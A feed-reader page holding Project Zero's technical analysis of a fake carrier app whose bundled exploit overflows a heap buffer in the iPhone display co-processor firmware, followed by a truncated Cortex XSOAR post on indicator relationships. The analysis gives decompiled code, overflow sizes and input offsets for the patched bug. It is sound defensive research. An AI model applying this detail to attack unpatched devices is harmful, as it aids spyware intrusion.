Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

The curious tale of a fake Carrier.app

23 June 2022 at 16:01

Posted by Ian Beer, Google Project Zero


NOTE: This issue was CVE-2021-30983 was fixed in iOS 15.2 in December 2021. 


Towards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with me:

App splash screen showing the Vodafone carrier logo and the text My Vodafone.

App splash screen showing the Vodafone carrier logo and the text "My Vodafone" (not the legitimate Vodadone app)



Although this looks like the real My Vodafone carrier app available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.


This sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple Enterprise developer program. This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push "trusted apps" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.


In collaboration with Project Zero, TAG has published an additional post with more details around the targeting and the actor. The rest of this blogpost is dedicated to the technical analysis of the app and the exploits contained therein.

App structure

The app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.


Agent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device like the Whatsapp messages database.


Six privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.


This blog post is the story of the last exploit and the month-long journey to understand it.

Something's missing? Or am I missing something?

Although all the exploits were different, five of them shared a common high-level structure. An initial phase where the kernel heap was manipulated to control object placement. Then the triggering of a kernel vulnerability followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory then building an arbitrary kernel memory write primitive.


The sixth exploit didn't have anything like that.


Perhaps it could be triggering a kernel logic bug like Linuz Henze's Fugu14 exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.


It contained log messages like:


  printf("Failed to prepare fake vtable: 0x%08x", ret);


which seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.


Shortly after that was this log message:


  printf("Waiting for R/W primitives...");


Why would you need to wait?


Then shortly after that:


  printf("Memory read/write and callfunc primitives ready!");


Up to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:


  printf("Unexpected data read from DCP: 0x%08x", v49);

DCP?

In October 2021 Adam Donenfeld tweeted this:


Screenshot of Tweet from @doadam on 11 Oct 2021, which is a retweet from @AmarSaar on 11 October 2021. The tweet from @AmarSaar reads 'So, another IOMFB vulnerability was exploited ITW (15.0.2). I bindiffed the patch and built a POC. And, because it's a great bug, I just finished writing a short blogpost with the tech details, to share this knowledge :) Check it out! https://saaramar.github.io/IOMFB_integer_overflow_poc/' and the retweet from @doadam reads 'This has been moved to the display coprocessor (DCP) starting from 15, at least on iPhone 12 (and most probably other ones as well)'.

DCP is the "Display Co-Processor" which ships with iPhone 12 and above and all M1 Macs.


There's little public information about the DCP; the most comprehensive comes from the Asahi linux project which is porting linux to M1 Macs. In their August 2021 and September 2021 updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by @alyssarzg. Asahi describe the DCP like this:


On most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary… they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU!

https://asahilinux.org/2021/08/progress-report-august-2021/


The Asahi linux project reverse-engineered the API to talk to the DCP but they are restricted to using Apple's DCP firmware (loaded by iBoot) - they can't use a custom DCP firmware. Consequently their documentation is limited to the DCP RPC API with few details of the DCP internals.

Setting the stage

Before diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?


Years ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. We can see in this M1 die shot from Tech Insights that the CPU cores in the middle and right hand side take up only around 10% of the die:

M1 die-shot from techinsights.com with possible location of DCP highlighted.

M1 die-shot from techinsights.com with possible location of DCP added

https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1


Companies like SystemPlus perform very thorough analysis of these dies. Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.


With just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.

My kingdom for a .dSYM!

The first step is to get the DCP firmware image. iPhones (and now M1 macs) use .ipsw files for system images. An .ipsw is really just a .zip archive and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems etc. The DCP firmware is this file:



  Firmware/dcp/iphone13dcp.im4p


The im4p in this case is just a 25 byte header which we can discard:


  $ dd if=iphone13dcp.im4p of=iphone13dcp bs=25 skip=1

  $ file iphone13dcp

  iphone13dcp: Mach-O 64-bit preload executable arm64


It's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:


  $ nm -a iphone13dcp

  iphone13dcp: no symbols


Function names make understanding code significantly easier. From looking at the handful of strings in the exploit some of them looked like they might be referencing symbols in a DCP firmware image ("M3_CA_ResponseLUT read: 0x%08x" for example) so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.


Since the firmware images are distributed as .zip files and Apple's servers support range requests with a bit of python and the partialzip tool we can relatively easily and quickly get every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.


Guess we'll have to do this the hard way!

Day 1; Instruction 1

$ otool -h raw_fw/iphone13dcp

raw_fw/iphone13dcp:

Mach header

magic      cputype   cpusubtype caps filetype ncmds sizeofcmds flags

0xfeedfacf 0x100000C 0          0x00 5        5     2240       0x00000001


That cputype is plain arm64 (ArmV8) without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.


With any brand new binary I usually start with a brief look through the function names and the strings. The binary is stripped so there are no function name symbols but there are plenty of C++ function names as strings:


A short list of C++ prototypes like IOMFB::UPBlock_ALSS::init(IOMFB::UPPipe *).

The cross-references to those strings look like this:


log(0x40000001LL,

    "UPBlock_ALSS.cpp",

    341,

    "%s: capture buffer exhausted, aborting capture\n",

    "void IOMFB::UPBlock_ALSS::send_data(uint64_t, uint32_t)");


This is almost certainly a logging macro which expands __FILE__, __LINE__ and __PRETTY_FUNCTION__. This allows us to start renaming functions and finding vtable pointers.

Object structure

From the Asahi linux blog posts we know that the DCP is using an Apple-proprietary RTOS called RTKit for which there is very little public information. There are some strings in the binary with the exact version:


ADD  X8, X8, #aLocalIphone13d@PAGEOFF ; "local-iphone13dcp.release"

ADD  X9, X9, #aRtkitIos182640@PAGEOFF ; "RTKit_iOS-1826.40.9.debug"


The code appears to be predominantly C++. There appear to be multiple C++ object hierarchies; those involved with this vulnerability look a bit like IOKit C++ objects. Their common base class looks like this:


struct __cppobj RTKIT_RC_RTTI_BASE

{

  RTKIT_RC_RTTI_BASE_vtbl *__vftable /*VFT*/;

  uint32_t refcnt;

  uint32_t typeid;

};


(These structure definitions are in the format IDA uses for C++-like objects)


The RTKit base class has a vtable pointer, a reference count and a four-byte Run Time Type Information (RTTI) field - a 4-byte ASCII identifier like BLHA, WOLO, MMAP, UNPI, OSST, OSBO and so on. These identifiers look a bit cryptic but they're quite descriptive once you figure them out (and I'll describe the relevant ones as we encounter them.)


The base type has the following associated vtable:


struct /*VFT*/ RTKIT_RC_RTTI_BASE_vtbl

{

  void (__cdecl *take_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *take_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *getClassName)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *dtor_a)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *unk)(RTKIT_RC_RTTI_BASE *this);

};

Exploit flow

The exploit running in the app starts by opening an IOKit user client for the AppleCLCD2 service. AppleCLCD seems to be the application processor of IOMobileFrameBuffer and AppleCLCD2 the DCP version.


The exploit only calls 3 different external method selectors on the AppleCLCD2 user client: 68, 78 and 79.


The one with the largest and most interesting-looking input is 78, which corresponds to this user client method in the kernel driver:


IOReturn

IOMobileFramebufferUserClient::s_set_block(

  IOMobileFramebufferUserClient *this,

  void *reference,

  IOExternalMethodArguments *args)

{

  const unsigned __int64 *extra_args;

  u8 *structureInput;

  structureInput = args->structureInput;

  if ( structureInput && args->scalarInputCount >= 2 )

  {

    if ( args->scalarInputCount == 2 )

      extra_args = 0LL;

    else

      extra_args = args->scalarInput + 2;

    return this->framebuffer_ap->set_block_dcp(

             this->task,

             args->scalarInput[0],

             args->scalarInput[1],

             extra_args,

             args->scalarInputCount - 2,

             structureInput,

             args->structureInputSize);

  } else {

    return 0xE00002C2;

  }

}


this unpacks the IOConnectCallMethod arguments and passes them to:


IOMobileFramebufferAP::set_block_dcp(

        IOMobileFramebufferAP *this,

        task *task,

        int first_scalar_input,

        int second_scalar_input,

        const unsigned __int64 *pointer_to_remaining_scalar_inputs,

        unsigned int scalar_input_count_minus_2,

        const unsigned __int8 *struct_input,

        unsigned __int64 struct_input_size)


This method uses some autogenerated code to serialise the external method arguments into a buffer like this:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u64 cntExtraScalars

  u8[] structInput

  u64 CntStructInput

}


which is then passed to UnifiedPipeline2::rpc along with a 4-byte ASCII method identifier ('A435' here):


UnifiedPipeline2::rpc(

      'A435',

      arg_struct,

      0x105Cu,

      &retval_buf,

      4u);


UnifiedPipeline2::rpc calls DCPLink::rpc which calls AppleDCPLinkService::rpc to perform one more level of serialisation which packs the method identifier and a "stream identifier" together with the arg_struct shown above.


AppleDCPLinkService::rpc then calls rpc_caller_gated to allocate space in a shared memory buffer, copy the buffer into there then signal to the DCP that a message is available.


Effectively the implementation of the IOMobileFramebuffer user client has been moved on to the DCP and the external method interface is now a proxy shim, via shared memory, to the actual implementations of the external methods which run on the DCP.

Exploit flow: the other side

The next challenge is to find where the messages start being processed on the DCP. Looking through the log strings there's a function which is clearly called ​​rpc_callee_gated - quite likely that's the receive side of the function rpc_caller_gated we saw earlier.


rpc_callee_gated unpacks the wire format then has an enormous switch statement which maps all the 4-letter RPC codes to function pointers:


      switch ( rpc_id )

      {

        case 'A000':

          goto LABEL_146;

        case 'A001':

          handler_fptr = callback_handler_A001;

          break;

        case 'A002':

          handler_fptr = callback_handler_A002;

          break;

        case 'A003':

          handler_fptr = callback_handler_A003;

          break;

        case 'A004':

          handler_fptr = callback_handler_A004;

          break;

        case 'A005':

          handler_fptr = callback_handler_A005;

          break;


At the the bottom of this switch statement is the invocation of the callback handler:


ret = handler_fptr(

          meta,

          in_struct_ptr,

          in_struct_size,

          out_struct_ptr,

          out_struct_size);


in_struct_ptr points to a copy of the serialised IOConnectCallMethod arguments we saw being serialized earlier on the application processor:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u32 cntExtraScalars

  u8[] structInput

  u64 cntStructInput

}


The callback unpacks that buffer and calls a C++ virtual function:


unsigned int

callback_handler_A435(

  u8* meta,

  void *args,

  uint32_t args_size,

  void *out_struct_ptr,

  uint32_t out_struct_size

{

  int64 instance_id;

  uint64_t instance;

  int err;

  int retval;

  unsigned int result;

  instance_id = meta->instance_id;

  instance =

    global_instance_table[instance_id].IOMobileFramebufferType;

  if ( !instance ) {

    log_fatal(

      "IOMFB: %s: no instance for instance ID: %u\n",

      "static T *IOMFB::InstanceTracker::instance"

        "(IOMFB::InstanceTracker::tracked_entity_t, uint32_t)"

        " [T = IOMobileFramebuffer]",

      instance_id);

  }

  err = (instance-16)->vtable_0x378( // virtual call

         (instance-16),

         args->task,

         args->scalar_input_0,

         args->scalar_input_1,

         args->remaining_scalar_inputs,

         args->cntExtraScalars,

         args->structInput,

         args->cntStructInput);

  retval = convert_error(err);

  result = 0;

  *(_DWORD *)out_struct_ptr = retval;

  return result;

}


The challenge here is to figure out where that virtual call goes. The object is being looked up in a global table based on the instance id. We can't just set a breakpoint and whilst emulating the firmware is probably possible that would likely be a long project in itself. I took a hackier approach: we know that the vtable needs to be at least 0x380 bytes large so just go through all those vtables, decompile them and see if the prototypes look reasonable!


There's one clear match in the vtable for the UNPI type:

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)


Here's my reversed implementation of UNPI::set_block

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)

{

  struct block_handler_holder *holder;

  struct metadispatcher metadisp;

  if ( second_scalar_input )

    return 0x80000001LL;

  holder = this->UPPipeDCP_H13P->block_handler_holders;

  if ( !holder )

    return 0x8000000BLL;

  metadisp.address_of_some_zerofill_static_buffer = &unk_3B8D18;

  metadisp.handlers_holder = holder;

  metadisp.structure_input_buffer = structure_input_buffer;

  metadisp.structure_input_size = structure_input_size;

  metadisp.remaining_scalar_inputs = remaining_scalar_inputs;

  metadisp.cnt_remaining_sclar_input = cnt_remaining_scalar_inputs;

  metadisp.some_flags = 0x40000000LL;

  metadisp.dispatcher_fptr = a_dispatcher;

  metadisp.offset_of_something_which_looks_serialization_related = &off_1C1308;

  return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);

}


This method wraps up the arguments into another structure I've called metadispatcher:


struct __attribute__((aligned(8))) metadispatcher

{

 uint64_t address_of_some_zerofill_static_buffer;

 uint64_t some_flags;

 __int64 (__fastcall *dispatcher_fptr)(struct metadispatcher *, struct BlockHandler *, __int64, _QWORD);

 uint64_t offset_of_something_which_looks_serialization_related;

 struct block_handler_holder *handlers_holder;

 uint64_t structure_input_buffer;

 uint64_t structure_input_size;

 uint64_t remaining_scalar_inputs;

 uint32_t cnt_remaining_sclar_input;

};


That metadispatcher object is then passed to this method:


return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);


In there we reach this code:


  block_type_handler = lookup_a_handler_for_block_type_and_subtype(

                         a1,

                         first_scalar_input, // block_type

                         a3);                // subtype


The exploit calls this set_block external method twice, passing two different values for first_scalar_input, 7 and 19. Here we can see that those correspond to looking up two different block handler objects here.


The lookup function searches a linked list of block handler structures; the head of the list is stored at offset 0x1448 in the UPPipeDCP_H13P object and registered dynamically by a method I've named add_handler_for_block_type:


add_handler_for_block_type(struct block_handler_holder *handler_list,

                           struct BlockHandler *handler)

The logging code tells us that this is in a file called IOMFBBlockManager.cpp. IDA finds 44 cross-references to this method, indicating that there are probably that many different block handlers. The structure of each registered block handler is something like this:


struct __cppobj BlockHandler : RTKIT_RC_RTTI_BASE

{

  uint64_t field_16;

  struct handler_inner_types_entry *inner_types_array;

  uint32_t n_inner_types_array_entries;

  uint32_t field_36;

  uint8_t can_run_without_commandgate;

  uint32_t block_type;

  uint64_t list_link;

  uint64_t list_other_link;

  uint32_t some_other_type_field;

  uint32_t some_other_type_field2;

  uint32_t expected_structure_io_size;

  uint32_t field_76;

  uint64_t getBlock_Impl;

  uint64_t setBlock_Impl;

  uint64_t field_96;

  uint64_t back_ptr_to_UPPipeDCP_H13P;

};


The RTTI type is BLHA (BLock HAndler.)


For example, here's the codepath which builds and registers block handler type 24:


BLHA_24 = (struct BlockHandler *)CXXnew(112LL);

BLHA_24->__vftable = (BlockHandler_vtbl *)BLHA_super_vtable;

BLHA_24->block_type = 24;

BLHA_24->refcnt = 1;

BLHA_24->can_run_without_commandgate = 0;

BLHA_24->some_other_type_field = 0LL;

BLHA_24->expected_structure_io_size = 0xD20;

typeid = typeid_BLHA();

BLHA_24->typeid = typeid;

modify_typeid_ref(typeid, 1);

BLHA_24->__vftable = vtable_BLHA_subclass_type_24;

BLHA_24->inner_types_array = 0LL;

BLHA_24->n_inner_types_array_entries = 0;

BLHA_24->getBlock_Impl = BLHA_24_getBlock_Impl;

BLHA_24->setBlock_Impl = BLHA_24_setBlock_Impl;

BLHA_24->field_96 = 0LL;

BLHA_24->back_ptr_to_UPPipeDCP_H13P = a1;

add_handler_for_block_type(list_holder, BLHA_24);


Each block handler optionally has getBlock_Impl and setBlock_Impl function pointers which appear to implement the actual setting and getting operations.


We can go through all the callsites which add block handlers; tell IDA the type of the arguments and name all the getBlock and setBlock implementations:


The IDA Pro Names window showing a list of symbols like BLHA_15_getBlock_Impl.

You can perhaps see where this is going: that's looking like really quite a lot of reachable attack surface! Each of those setBlock_Impl functions is reachable by passing a different value for the first scalar argument to IOConnectCallMethod 78.


There's a little bit more reversing though to figure out how exactly to get controlled bytes to those setBlock_Impl functions:

Memory Mapping

The raw "block" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input. There's another level of indirection: each individual block handler structure has an array of supported "subtypes" which contains metadata detailing where to find the (userspace) pointer to that subtype's input data in the IOConnectCallMethod structure input. The first dword in the structure input is the id of this subtype - in this case for the block handler type 19 the metadata array has a single entry:


<2, 0, 0x5F8, 0x600>


The first value (2) is the subtype id and 0x5f8 and 0x600 tell the DCP from what offset in the structure input data to read a pointer and size from. The DCP then requests a memory mapping from the AP for that memory from the calling task:


return wrap_MemoryDescriptor::withAddressRange(

  *(void*)(structure_input_buffer + addr_offset),

  *(unsigned int *)(structure_input_buffer + size_offset),

  caller_task_ptr);


We saw earlier that the AP sends the DCP the struct task pointer of the calling task; when the DCP requests a memory mapping from a user task it sends those raw task struct pointers back to the AP such that the kernel can perform the mapping from the correct task. The memory mapping is abstracted as an MDES object on the DCP side; the implementation of the mapping involves the DCP making an RPC to the AP:


make_link_call('D453', &req, 0x20, &resp, 0x14);


which corresponds to a call to this method on the AP side:


IOMFB::MemDescRelay::withAddressRange(unsigned long long, unsigned long long, unsigned int, task*, unsigned long*, unsigned long long*)


The DCP calls ::prepare and ::map on the returned MDES object (exactly like an IOMemoryDescriptor object in IOKit), gets the mapped pointer and size to pass via a few final levels of indirection to the block handler:


a_descriptor_with_controlled_stuff->dispatcher_fptr(

  a_descriptor_with_controlled_stuff,

  block_type_handler,

  important_ptr,

  important_size);


where the dispatcher_fptr looks like this:


a_dispatcher(

        struct metadispatcher *disp,

        struct BlockHandler *block_handler,

        __int64 controlled_ptr,

        unsigned int controlled_size)

{

  return block_handler->BlockHandler_setBlock(

           block_handler,

           disp->structure_input_buffer,

           disp->structure_input_size,

           disp->remaining_scalar_inputs,

           disp->cnt_remaining_sclar_input,

           disp->handlers_holder->gate,

           controlled_ptr,

           controlled_size);

}


You can see here just how useful it is to keep making structure definitions while reversing; there are so many levels of indirection that it's pretty much impossible to keep it all in your head.


BlockHandler_setBlock is a virtual method on BLHA. This is the implementation for BLHA 19:


BlockHandler19::setBlock(

  struct BlockHandler *this,

  void *structure_input_buffer,

  int64 structure_input_size,

  int64 *remaining_scalar_inputs,

  unsigned int cnt_remaining_scalar_inputs,

  struct CommandGate *gate,

  void* mapped_mdesc_ptr,

  unsigned int mapped_mdesc_length)


This uses a Command Gate (GATI) object (like a call gate in IOKit to serialise calls) to finally get close to actually calling the setBlock_Impl function.


We need to reverse the gate_context structure to follow the controlled data through the gate:


struct __attribute__((aligned(8))) gate_context

{

 struct BlockHandler *the_target_this;

 uint64_t structure_input_buffer;

 void *remaining_scalar_inputs;

 uint32_t cnt_remaining_scalar_inputs;

 uint32_t field_28;

 uint64_t controlled_ptr;

 uint32_t controlled_length;

};


The callgate object uses that context object to finally call the BLHA setBlock handler:


callback_used_by_callgate_in_block_19_setBlock(

  struct UnifiedPipeline *parent_pipeline,

  struct gate_context *context,

  int64 a3,

  int64 a4,

  int64 a5)

{

  return context->the_target_this->setBlock_Impl)(

           context->the_target_this->back_ptr_to_UPPipeDCP_H13P,

           context->structure_input_buffer,

           context->remaining_scalar_inputs,

           context->cnt_remaining_scalar_inputs,

           context->controlled_ptr,

           context->controlled_length);

}

SetBlock_Impl

And finally we've made it through the whole callstack following the controlled data from IOConnectCallMethod in userspace on the AP to the setBlock_Impl methods on the DCP!


The prototype of the setBlock_Impl methods looks like this:


setBlock_Impl(struct UPPipeDCP_H13P *pipe_parent,

              void *structure_input_buffer,

              int *remaining_scalar_inputs,

              int cnt_remaining_scalar_inputs,

              void* ptr_via_memdesc,

              unsigned int len_of_memdesc_mapped_buf)


The exploit calls two setBlock_Impl methods; 7 and 19. 7 is fairly simple and seems to just be used to put controlled data in a known location. 19 is the buggy one. From the log strings we can tell that block type 19 handler is implemented in a file called UniformityCompensator.cpp.


Uniformity Compensation is a way to correct for inconsistencies in brightness and colour reproduction across a display panel. Block type 19 sets and gets a data structure containing this correction information. The setBlock_Impl method calls UniformityCompensator::set and reaches the following code snippet where controlled_size is a fully-controlled u32 value read from the structure input and indirect_buffer_ptr points to the mapped buffer, the contents of which are also controlled:

uint8_t* pages = compensator->inline_buffer; // +0x24

for (int pg_cnt = 0; pg_cnt < 3; pg_cnt++) {

  uint8_t* this_page = pages;

  for (int i = 0; i < controlled_size; i++) {

    memcpy(this_page, indirect_buffer_ptr, 4 * controlled_size);

    indirect_buffer_ptr += 4 * controlled_size;

    this_page += 0x100;

  }

  pages += 0x4000;

}

There's a distinct lack of bounds checking on controlled_size. Based on the structure of the code it looks like it should be restricted to be less than or equal to 64 (as that would result in the input being completely copied to the output buffer.) The compensator->inline_buffer buffer is inline in the compensator object. The structure of the code makes it look that that buffer is probably 0xc000 (three 16k pages) large. To verify this we need to find the allocation site of this compensator object.


It's read from the pipe_parent object and we know that at this point pipe_parent is a UPPipeDCP_H13P object.


There's only one write to that field, here in UPPipeDCP_H13P::setup_tunables_base_target:


compensator = CXXnew(0xC608LL);

...

this->compensator = compensator;


The compensator object is a 0xc608 byte allocation; the 0xc000 sized buffer starts at offset 0x24 so the allocation has enough space for 0xc608-0x24=0xC5E4 bytes before corrupting neighbouring objects.


The structure input provided by the exploit for the block handler 19 setBlock call looks like this:


struct_input_for_block_handler_19[0x5F4] = 70; // controlled_size

struct_input_for_block_handler_19[0x5F8] = address;

struct_input_for_block_handler_19[0x600] = a_size;


This leads to a value of 70 (0x46) for controlled_size in the UniformityCompensator::set snippet shown earlier. (0x5f8 and 0x600 correspond to the offsets we saw earlier in the subtype's table:  <2, 0, 0x5F8, 0x600>)


The inner loop increments the destination pointer by 0x100 each iteration so 0x46 loop iterations will write 0x4618 bytes.


The outer loop writes to three subsequent 0x4000 byte blocks so the third (final) iteration starts writing at 0x24 + 0x8000 and writes a total of 0x4618 bytes, meaning the object would need to be 0xC63C bytes; but we can see that it's only 0xc608, meaning that it will overflow the allocation size by 0x34 bytes. The RTKit malloc implementation looks like it adds 8 bytes of metadata to each allocation so the next object starts at 0xc610.


How much input is consumed? The input is fully consumed with no "rewinding" so it's 3*0x46*0x46*4 = 0xe5b0 bytes. Working backwards from the end of that buffer we know that the final 0x34 bytes of it go off the end of the 0xc608 allocation which means +0xe57c in the input buffer will be the first byte which corrupts the 8 metadata bytes and +0x8584 will be the first byte to corrupt the next object:


A diagram showing that the end of the overflower object overlaps with the metadata and start of the target object.

This matches up exactly with the overflow object which the exploit builds:


  v24 = address + 0xE584;

  v25 = *(_DWORD *)&v54[48];

  v26 = *(_OWORD *)&v54[32];

  v27 = *(_OWORD *)&v54[16];

  *(_OWORD *)(address + 0xE584) = *(_OWORD *)v54;

  *(_OWORD *)(v24 + 16) = v27;

  *(_OWORD *)(v24 + 32) = v26;

  *(_DWORD *)(v24 + 48) = v25;


The destination object seems to be allocated very early and the DCP RTKit environment appears to be very deterministic with no ASLR. Almost certainly they are attempting to corrupt a neighbouring C++ object with a fake vtable pointer.


Unfortunately for our analysis the trail goes cold here and we can't fully recreate the rest of the exploit. The bytes for the fake DCP C++ object are read from a file in the app's temporary directory (base64 encoded inside a JSON file under the exploit_struct_offsets key) and I don't have a copy of that file. But based on the flow of the rest of the exploit it's pretty clear what happens next:

sudo make me a DART mapping

The DCP, like other coprocessors on iPhone, sits behind a DART (Device Address Resolution Table.) This is like an SMMU (IOMMU in the x86 world) which forces an extra layer of physical address lookup between the DCP and physical memory. DART was covered in great detail in Gal Beniamini's Over The Air - Vol. 2, Pt. 3 blog post.


The DCP clearly needs to access lots of buffers owned by userspace tasks as well as memory managed by the kernel. To do this the DCP makes RPC calls back to the AP which modifies the DART entries accordingly. This appears to be exactly what the DCP exploit does: the D45X family of DCP->AP RPC methods appear to expose an interface for requesting arbitrary physical as well as virtual addresses to be mapped into the DCP DART.


The fake C++ object is most likely a stub which makes such calls on behalf of the exploit, allowing the exploit to read and write kernel memory.

Conclusions

Segmentation and isolation are in general a positive thing when it comes to security. However, splitting up an existing system into separate, intercommunicating parts can end up exposing unexpected code in unexpected ways.


We've had discussions within Project Zero about whether this DCP vulnerability is interesting at all. After all, if the UniformityCompensator code was going to be running on the Application Processors anyway then the Display Co-Processor didn't really introduce or cause this bug.


Whilst that's true, it's also the case that the DCP certainly made exploitation of this bug significantly easier and more reliable than it would have been on the AP. Apple has invested heavily in memory corruption mitigations over the last few years, so moving an attack surface from a "mitigation heavy" environment to a "mitigation light" one is a regression in that sense.


Another perspective is that the DCP just isn't isolated enough; perhaps the intention was to try to isolate the code on the DCP such that even if it's compromised it's limited in the effect it could have on the entire system. For example, there might be models where the DCP to AP RPC interface is much more restricted.


But again there's a tradeoff: the more restrictive the RPC API, the more the DCP code has to be refactored - a significant investment. Currently, the codebase relies on being able to map arbitrary memory and the API involves passing userspace pointers back and forth.


I've discussed in recent posts how attackers tend to be ahead of the curve. As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too. We saw that in the logic-bug sandbox escape used by NSO and we see that here in this memory-corruption-based privilege escalation that side-stepped kernel mitigations by corrupting memory on a co-processor instead. Both are quite likely to continue working in some form in a post-memory tagging world. Both reveal the stunning depth of attack surface available to the motivated attacker. And both show that defensive security research still has a lot of work to do.

Cortex XSOAR Tips & Tricks – Creating indicator relationships in automations

23 June 2022 at 08:00

Introduction

In Cortex XSOAR, indicators are a key part of the platform as they visualize the Indicators Of Compromise (IOC) of a security alert in the incident to the SOC analyst and can be used in automated analysis workflows to determine the incident outcome. If you have a Cortex XSOAR Threat Intelligence Management (TIM) license, it is possible to create predefined relationships between indicators to describe how they relate to each other. This enables the SOC analyst to do a more efficient incident analysis based on the indicators associated to the incident.

In this blog post, we will provide some insights into the features of Cortex XSOAR Threat Intelligence Management and how to create indicator relationships in an automation.

Threat Intelligence Management

Threat Intelligence Management (TIM) is a new feature in Cortex XSOAR which requires an additional license on top of your Cortex XSOAR user licenses. It is created to improve the use of threat intel in your SOC. Using TIM, you can automate threat intel management by ingesting and processing indicators sources to export the enriched intelligence data to the SIEMs, firewalls, and other security platforms.

Cortex XSOAR TIM is a Threat Intelligence Platform with highly actionable Threat data from Unit 42 and not only identify and discover new malware families or campaigns but ability to create and disseminate strategic intelligence reports.

https://www.paloaltonetworks.com/cortex/threat-intel-management

When the TIM license is imported into your Cortex XSOAR environment, all built-in indicator types will have a new Unit 42 Intel tab available:

Unit 42 Intel

This tab contains the threat intelligence data for the specific indicator gathered by Palo Alto and makes it directly available to your SOC analysts.

For Cortex XSOAR File indicators, the Wildfire analysis (the cloud-base threat analysis service of Palo Alto) is available in the indicator layout providing your SOC analysts a detailed analysis of malicious binaries if its file hash is known:

Wildfire Analysis

The TIM license also adds the capability to Cortex XSOAR to create relationships between indicators.

If you for example have the following indicators in Cortex XSOAR:

  • Host: ict135456.domain.local
  • MAC: 38-DA-09-8D-57-B1
  • Account: u4872
  • IP: 10.15.62.78
  • IP: 78.132.17.56

Without a TIM license, these indicators would be visible in the indicators section in the incident layout without any context about how they relate to each other:

By creating relationships between these indicators, a SOC analyst can quickly see how these indicators have interacted with each other during the detected incident:

Indicator Relationships

EntityRelationship Class

To create indicator relationships, the EntityRelationship class is available in the CommonServerPython automation.

CommonServerPython is an automation created by Palo Alto which contains Python code that can be used by other automations. Similar to CommonServerUserPython, CommonServerPython is added to all automations making the code available for you to use in your own custom automation.

In the Relationships subclass of EntityRelationship, you can find all the possible relationships that can be created and how they relate to each other.

RELATIONSHIPS_NAMES = {'applied': 'applied-on',
                       'attachment-of': 'attaches',
                       'attaches': 'attachment-of',
                       'attribute-of': 'owns',
                       'attributed-by': 'attributed-to',
                       'attributed-to': 'attributed-by',
                       'authored-by': 'author-of',
                       'beacons-to': 'communicated-by',
                       'bundled-in': 'bundles',
                       'bundles': 'bundled-in',
                       'communicated-with': 'communicated-by',
                       'communicated-by': 'communicates-with',
                       'communicates-with': 'communicated-by',
                       'compromises': 'compromised-by',
                       'contains': 'part-of',
                       .......

You can define a relationship between indicators by creating an instance of the EntityRelationship class:

